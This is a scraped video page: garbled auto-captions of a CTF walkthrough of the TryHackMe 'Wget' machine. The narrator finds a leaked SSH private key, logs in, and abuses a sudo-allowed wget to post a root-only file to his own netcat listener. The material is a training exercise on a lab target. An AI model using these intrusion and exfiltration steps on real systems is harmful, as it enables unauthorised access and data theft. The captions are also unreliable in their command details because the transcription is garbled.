Beginner and Easy CTF | TryHackme Wget CTF

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on youtube welcome back in today's video we're going to do another popular and easy machine on tryhackme the machine name is wiggle ctf and the objective on this machine is to exfiltrate the root flag so we're not required to gain root shell rather rather to gain the actual flag from the machine so i haven't prepared anything on the board we usually right on in any in every video since the machine is easy and is aimed out of those who are getting started so as you can see we have two flags required so let's get started so i have done the nmap scan and as you can see here we have two open ports 32 and 80. take a look at the flags i have used this is actually a noisy scan it's not recommended if you are scanning a target behind a firewall this is for enumerating the services and the corresponding versions and this for accuracy of scan so as you can see we have two open ports 22 and 80. right off the bat we start the browser and we navigate to the port 80 so we see what the page looks like since we don't have any credentials always when you don't have credentials you cannot just go ahead and start with portfolio too some in some cases in some cases you may you may just look if the open ssh version here 7.2 has an exploit if it has an exploit go the quickest path but normally normally we start first with the action with the port 80 so we navigate now to the page okay and this is the apache default page um when you actually install apache this is the first page which is the default page uh you get when you first navigate to the ip address or the address of the server now since there's nothing nothing on here we're gonna do what we're gonna start go buster enumerating directories and files on the target server so we take in the ip now comes the choose of the word list so slash user share mo drp the irp word lists let's choose common the text and there you go now govester will actually is actually trying to find directories and files on the server that give 200 response from the server where the the actual files and directories exist so we can navigate and explore them as you can see we have index.html with 200 response code the others have 403 we're interested in these we have server status we have sitemap which is interesting because it gives actually 301 redirect 301 means redirect to another page this is the page so let's go to sitemap and explore the page so when you open sitemap we get this page take on your biggest projects and goals with un apps high quality features so this is an app page but it's an empty one i guess as you can see or it's not loading correctly let me refresh the page on app template okay so if you take a look now at the page source let's see here normally in ctf's page source contains useful information for your progress so we're looking here for uh useful comments hidden fields nothing in here we didn't do that for the default apache page normally you won't find you won't find much useful data in the in this page but let's take a look at the page search maybe there is something in here um scroll down okay take a look at this jesse don't forget to update the site and take a look at the grammar here there is problem in the grammar which means maybe the developer or someone else has actually typed in the comments right normally in the apache default page there is no such comment in the default installation just you don't forget forget to update the site so this actually has been written on purpose so which means this jesse is actually a potential username so we keep jesse in mind and we get back here okay here there is nothing in this in the site map in the page source so let's run further scan on the sitemap we're going to use go buster one more time and this time we will type here sitemap see if there are sub directories under sitemap we don't know about and indeed guys as you can see we have one slash dot ssh um if you know what i mean there might be an a private key here under this directory let's let's navigate to that dot ssh it's very weird to find this um indeed we have id rsa and when you click on that you get a private key now coupled with the fact that we have stumbled upon a username in the page source or the html page source therefore we're gonna attempt to log in to the ssh server with these information so ls let's see what do we have in here i have many stuff on uh messy stuff here so i'm gonna ignore all of that i'm gonna create a private key on nano id rsa okay save that and we're going to adjust the permissions of that private key id rsa okay now we're going to attempt to log into the web server ssh server sudo ssh-iid rsa and username we have found okay and the address let's see here and yes and we are logged in so what are the takeaways until now uh there are no actual takeaways from this machine up until this point as you can see we haven't done anything right we just did an nmap scan we actually then did directory search on the web server we found a couple directories and there is a leaked sss credentials that's it enumeration enumeration is key all the time okay so now we've got access to the search server let's grab the user flag so pwd where i am i am under jesse ls cd desktop okay so id you name a linux corp1 okay so let's issue find find dash type file dash name and we're looking for let's see the name of the file user flag okay so um what could be the file name user like that and then they've not nothing in here so there is nothing no file called user dot something so let's try the text okay so i guess we have forgot to define where we want to look for that this file so under the root file system or in all the file system let's search if there is any file like that so we use the star here guys the star here is actually kind of regular expression to tell the find command that we're looking to find we're looking for a file that starts that its name starts with user and ends with anything else after the r let's see here okay so we modify the command and we make we put e here okay here is it home jesse documents user underscore flag so cat and this is the user flag okay now the root flag so root flag we need to be root right so sudo dash l so we can issue user bin w get as root without the needle supply password so what does that mean it means we can download the root flag it means we can download the root flag guys uh using the wget so how to do that we're gonna start the listener on my machine nc lvp is a455 um nc here yep and we can issue a command here sudo user bin wgets so as you know devil gate is used to download files right and also they will get is used to post files to a listener so if you have got listener here we can actually use wk to post files to the listener so using the following command so dash dash we define first the post file what is what is the file we would like to post equal um we suspect that root flag actually is located under the usual directory slash root slash flag right so slash what we don't know but we don't define name yet so we have to find our define name so let's go back and it should define command so we're looking for here something like root and we put star here to tell find that we would like to find all the files right whose name start with root and don't matter what everything else what everything else comes after the t let's see here we're looking to we're going to find out the root the file the file name of the root flag so root underscore max keys max bytes uh i'm guessing i'm guessing that uh we will not be able to find the name since the name actually is under the root the file is under the root flag and we don't have permission to access that directory in this case we're gonna just attempt to do something like that so the post file here we're going back to the wgt command so who will you get where is the where is the command okay i have to type this from scratch so sudo dash l okay sudo user and the way you and then http we need my ip address and the port i'm using as a listener four five four five so root slash root flag missing no such file or directory so it means root flag is not the correct file name okay then let's go back and try to find let's remove this one okay all right i have an idea so we can look in under the root file system right nothing okay let's look for all text files maybe so text like that so it's definitely a text file right so let's look for all text files under the root file system order directory nothing okay let's cancel the route show me all the text files so we have got the user flag i am sure we need we will be able to find the name of this file okay so no hints about the find name and it's actually clear that we cannot access the slash root directory to enumerate or to find out what are the file names in there let me get back see if there is something about this file root flag okay we need the filename guys so we have to rely on guessing here so let's instead of root flag here as a file name let's try with root.text missing file okay not the correct file name so root text is not the file name root flag is not of a correct file name let's try with flag alone again not the correct file name so what could be the finding of this flag of the root file the root flag let's try root underscore flag ah this time worked okay so this is the root flag so what worked actually the actual file name is root underscore flag right we tried combinations of flag alone root individually uh root flag didn't work the one that worked is root underscore flag so this is the flag we're gonna now paste this and end this challenge so that was today's challenge guys i hope you liked the video and see you later

Info

Channel: Motasem Hamdan

Views: 4,449

Rating: undefined out of 5

Keywords: CTF, Wget, linux, SSH

Id: 0lcxs0sn70o

Channel Id: undefined

Length: 16min 22sec (982 seconds)

Published: Tue Mar 29 2022